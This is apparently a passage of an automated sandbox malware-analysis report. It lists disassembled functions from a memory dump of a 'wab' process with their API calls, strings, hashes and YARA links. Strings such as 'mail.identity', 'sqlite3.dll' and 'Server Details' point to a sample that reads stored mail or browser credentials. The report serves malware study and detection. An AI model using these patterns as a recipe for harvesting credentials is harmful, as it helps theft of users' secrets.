                                                                • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                                                • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                                                • Part of subcall function 004108E5: memcpy.MSVCRT ref: 00410961
                                                              • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 0040279C
                                                              • LocalFree.KERNEL32(?), ref: 004027A6
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: ByteCharFromMultiStringUuidWide$FreeLocalQueryValuememcpymemset
                                                              • String ID:
                                                              • API String ID: 1593657333-0
                                                              • Opcode ID: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                                                              • Instruction ID: aa14e43d8b473801bf9d2631992dc1640396fa6537153de3cc175e43cdbeb3f4
                                                              • Opcode Fuzzy Hash: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                                                              • Instruction Fuzzy Hash: 0B4183B1408384BFD711DB60CD85AAB77D8AF89314F044A3FF998A31C1D679DA44CB5A
                                                              Function 0040B5E5 Relevance: 6.1, APIs: 4, Instructions: 114stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00409DED: ??2@YAPAXI@Z.MSVCRT ref: 00409E0E
                                                                • Part of subcall function 00409DED: ??3@YAXPAX@Z.MSVCRT ref: 00409ED5
                                                              • strlen.MSVCRT ref: 0040B60B
                                                              • atoi.MSVCRT ref: 0040B619
                                                              • _mbsicmp.MSVCRT ref: 0040B66C
                                                              • _mbsicmp.MSVCRT ref: 0040B67F
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: _mbsicmp$??2@??3@atoistrlen
                                                              • String ID:
                                                              • API String ID: 4107816708-0
                                                              • Opcode ID: 481fecb55ebe7fb47740a6b69fad8160bec1c4c1e9b6d2800cf49c311f8ba602
                                                              • Instruction ID: e44d10e2ba05df3f3c4ea20365ac2b40f6a529c5f902ff1350b2aa0f2f7d2ce1
                                                              • Opcode Fuzzy Hash: 481fecb55ebe7fb47740a6b69fad8160bec1c4c1e9b6d2800cf49c311f8ba602
                                                              • Instruction Fuzzy Hash: 3A413D35900204EFCF10DFA9C481AA9BBF4FF48348F1144BAE815AB392D739DA41CB99
                                                              Function 004113B2 Relevance: 6.1, APIs: 4, Instructions: 85stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_gmtime64memcpystrftime
                                                              • String ID:
                                                              • API String ID: 1886415126-0
                                                              • Opcode ID: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                                                              • Instruction ID: 0fc2308174198aa020173da426f8fce31fb0284c5be342abf897f659f69a0370
                                                              • Opcode Fuzzy Hash: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                                                              • Instruction Fuzzy Hash: 6F21E472A013145BD320EB69C846B5BB7D8AF44734F044A1FFAA8D73D1D738E9448699
                                                              Function 00444462 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 84stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: strlen
                                                              • String ID: >$>$>
                                                              • API String ID: 39653677-3911187716
                                                              • Opcode ID: fe8035a2bc0feec0fd3c25fdeb621276a2bec91dd981480682d5a40b5cd82bd5
                                                              • Instruction ID: 00f684ae2741cafacb4c0f359147db44c9a3c2c025b4d94400920e38b4f60055
                                                              • Opcode Fuzzy Hash: fe8035a2bc0feec0fd3c25fdeb621276a2bec91dd981480682d5a40b5cd82bd5
                                                              • Instruction Fuzzy Hash: E131261180D6C4AEEB11CFA880463EEFFB05FA2304F5886DAD0D047743C67C964AC3AA
                                                              Function 0040D205 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 67COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memcpy
                                                              • String ID: @
                                                              • API String ID: 3510742995-2766056989
                                                              • Opcode ID: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                              • Instruction ID: 6d1199ef97cb2679a5b3fe4a4c98cea7b7ae300cfbacc21e3dff9814a3884c4c
                                                              • Opcode Fuzzy Hash: 5364360adcdec80b12010bd2de721da4a734fa53c949916e07c670fac02dc71b
                                                              • Instruction Fuzzy Hash: 41113DB2E007046BDB288E96DC80D5A77A8EFA0354700013FFE06662D1F639EA5DC7D8
                                                              Function 0040E1C8 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 59COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: _strcmpi
                                                              • String ID: C@$mail.identity
                                                              • API String ID: 1439213657-721921413
                                                              • Opcode ID: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                                                              • Instruction ID: e081b0b03caa8c584547328dd3c7b46ba64ccdb110812537a35def5e1e6d8c92
                                                              • Opcode Fuzzy Hash: 4271e50fa9e0cb48d23f84e20e6912c8f7ba64196effffc20a844cddd1a4c075
                                                              • Instruction Fuzzy Hash: DD110A325002199BEB20AA65DC41E8A739CEF00358F10453FF545B6182EF38F9598B98
                                                              Function 00406620 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 50COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • memset.MSVCRT ref: 00406640
                                                                • Part of subcall function 004063B2: memset.MSVCRT ref: 0040644F
                                                                • Part of subcall function 004063B2: memcpy.MSVCRT ref: 00406462
                                                                • Part of subcall function 004063B2: memcpy.MSVCRT ref: 00406475
                                                              • memcmp.MSVCRT ref: 00406672
                                                              • memcpy.MSVCRT ref: 00406695
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memcpy$memset$memcmp
                                                              • String ID: Ul@
                                                              • API String ID: 270934217-715280498
                                                              • Opcode ID: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                                              • Instruction ID: 50cfa42ee3f36d69bd2a91aaf20a03d2fa08f341615043147a7a382cdea3e611
                                                              • Opcode Fuzzy Hash: ff49a6b21300bdc1e28d83de90f780c1e5e431fdc449c6fd399a747e7733bd1d
                                                              • Instruction Fuzzy Hash: 46017572A0020C6BEB10DAA58C06FEF73ADAB44705F450436FE49F2181E679AA1987B5
                                                              Function 0044B33B Relevance: 6.0, APIs: 4, Instructions: 25COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: ??3@
                                                              • String ID:
                                                              • API String ID: 613200358-0
                                                              • Opcode ID: 95fe0c5ee96a68655d96064396ecbffa5b8939de9cee66978f58e17f988e32ec
                                                              • Instruction ID: 5841ab7dcc50b440abd9236b7832042a9d7d1d7b8957bb774bcacf87f05c1f29
                                                              • Opcode Fuzzy Hash: 95fe0c5ee96a68655d96064396ecbffa5b8939de9cee66978f58e17f988e32ec
                                                              • Instruction Fuzzy Hash: AAE046A134974456BA10AF7BAC52F13239CEA803523168C6FB800F36D2EF2CE890846C
                                                              Function 0041865B Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 243COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 004176F4: memcmp.MSVCRT ref: 004177B6
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418726
                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00418770
                                                              Strings
                                                              • recovered %d pages from %s, xrefs: 004188B4
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$memcmp
                                                              • String ID: recovered %d pages from %s
                                                              • API String ID: 985450955-1623757624
                                                              • Opcode ID: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                                                              • Instruction ID: 98aa3c95e39363207900286e283e4ca218167c091a2ac8f6aa08d387a6555cb7
                                                              • Opcode Fuzzy Hash: 9d09b39b818056697e6918b79f21f12d68d35230e64058568acdb5651893ba04
                                                              • Instruction Fuzzy Hash: BA81AF759006049FDB25DBA8C880AEFB7F6EF84324F25441EE95597381DF38AD82CB58
                                                              Function 004021FF Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: _ultoasprintf
                                                              • String ID: %s %s %s
                                                              • API String ID: 432394123-3850900253
                                                              • Opcode ID: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                                                              • Instruction ID: 5b4e28b1b4fc8494891684f3550fd3cb18a3cec27640a2844273e51cea36df92
                                                              • Opcode Fuzzy Hash: 16242442a3dc2496cbd1affae0ffec3615c5459b66bdf10bcc66490599bfb82e
                                                              • Instruction Fuzzy Hash: 80412331504A15C7C93595648B8DBEBA3A8BB46300F5804BFDCAAB32C0D3FCAD42865E
                                                              Function 00409070 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadMenuA.USER32(00000000), ref: 00409078
                                                              • sprintf.MSVCRT ref: 0040909B
                                                                • Part of subcall function 00408F1B: GetMenuItemCount.USER32(?), ref: 00408F31
                                                                • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408F55
                                                                • Part of subcall function 00408F1B: GetMenuItemInfoA.USER32(?), ref: 00408F8B
                                                                • Part of subcall function 00408F1B: memset.MSVCRT ref: 00408FB8
                                                                • Part of subcall function 00408F1B: strchr.MSVCRT ref: 00408FC4
                                                                • Part of subcall function 00408F1B: _mbscat.MSVCRT ref: 0040901F
                                                                • Part of subcall function 00408F1B: ModifyMenuA.USER32(?,?,00000400,?,?), ref: 0040903B
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: Menu$Itemmemset$CountInfoLoadModify_mbscatsprintfstrchr
                                                              • String ID: menu_%d
                                                              • API String ID: 1129539653-2417748251
                                                              • Opcode ID: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                              • Instruction ID: bbc3668ae8aad1463aedfde5e5dd5b48340f77aa4c3989790123ead7330def9b
                                                              • Opcode Fuzzy Hash: be058396830e840a3b70168f9115533db366257c5066184df4aab31ac4a42a38
                                                              • Instruction Fuzzy Hash: 2ED0C260A4124036EA2023366C0AF4B1A099BC271AF14022EF000B20C3EBFC844482BE
                                                              Function 004116E1 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 21COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Strings
                                                              • failed memory resize %u to %u bytes, xrefs: 00411706
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: _msizerealloc
                                                              • String ID: failed memory resize %u to %u bytes
                                                              • API String ID: 2713192863-2134078882
                                                              • Opcode ID: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                                                              • Instruction ID: 6d708a2afe7937de994116278d2c06faa365a3e4d7322368aba5da3f7b150b0b
                                                              • Opcode Fuzzy Hash: b5cbcb03e4e476f93ec765dc128528ecfd056f92ca38a68215b2957d827f1bcd
                                                              • Instruction Fuzzy Hash: DBD0C2329092107EEB152250AC03B5FAB51DB80374F25850FF658451A1E6795C108389
                                                              Function 004070E3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _mbscpy.MSVCRT ref: 004070EB
                                                                • Part of subcall function 00406D55: strlen.MSVCRT ref: 00406D56
                                                                • Part of subcall function 00406D55: _mbscat.MSVCRT ref: 00406D6D
                                                              • _mbscat.MSVCRT ref: 004070FA
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: _mbscat$_mbscpystrlen
                                                              • String ID: sqlite3.dll
                                                              • API String ID: 1983510840-1155512374
                                                              • Opcode ID: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                                                              • Instruction ID: ab8058c300e11a65186fba7fca0927c942ef8f40a12134081a956aaad4b84faf
                                                              • Opcode Fuzzy Hash: 630fb5f27daad17d498a2939fbb1447296fc35da86cfe41959fb393c0c6f0023
                                                              • Instruction Fuzzy Hash: 42C0803340517035770276717D03A9F794DCF81355B01045AF54451112F529891241EB
                                                              Function 004033B0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 8COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetPrivateProfileStringA.KERNEL32(Server Details,?,0044C52F,A4@,0000007F,?), ref: 004033C8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: PrivateProfileString
                                                              • String ID: A4@$Server Details
                                                              • API String ID: 1096422788-4071850762
                                                              • Opcode ID: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                                              • Instruction ID: 3fa8da6ebb007cc1aa22036e73777017e29eb1af1cc7e931feee2a89adc62c4b
                                                              • Opcode Fuzzy Hash: 55c4497567308b46e508750365dc53e52d0a25bfb23d4dcbdca40916d4ea9269
                                                              • Instruction Fuzzy Hash: C8C08C32189301BAEA418F80AD46F0EBBA2EBA8B00F044409B244200A682B94020EF17
                                                              Function 0040848B Relevance: 5.1, APIs: 4, Instructions: 104stringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: FreeLocalmemcpymemsetstrlen
                                                              • String ID:
                                                              • API String ID: 3110682361-0
                                                              • Opcode ID: 603dab700e6bd2bbd406faeee6bfbbd01979f456a647da946a7e0cb9a238772f
                                                              • Instruction ID: 01a4a4a03dd67d82f411e1dd6e1cb40c430aa3add0a741e9cb7308dd065d79ab
                                                              • Opcode Fuzzy Hash: 603dab700e6bd2bbd406faeee6bfbbd01979f456a647da946a7e0cb9a238772f
                                                              • Instruction Fuzzy Hash: A331E572D0011DABDB10DB68CD81BDEBBB8EF55314F1005BAE944B7281DA38AE858B94
                                                              Function 004161CB Relevance: 5.1, APIs: 4, Instructions: 70COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000012.00000002.2249456931.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_18_2_400000_wab.jbxd
                                                              Similarity
                                                              • API ID: memcpy
                                                              • String ID:
                                                              • API String ID: 3510742995-0
                                                              • Opcode ID: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                              • Instruction ID: 2ace43f3ece935e7cd0bce4b95d7f51bbc88ae08637005f1eff78ef908a12d17
                                                              • Opcode Fuzzy Hash: 382e58b0fa3d8fe0cb6053be8dd65ba46c4ee018798b4ba153f9c1234f43a83e
                                                              • Instruction Fuzzy Hash: 4B1189B3E002186BEB00EFA5DC49EDEB7ACEB59311F454536FA05DB141E634E648C7A8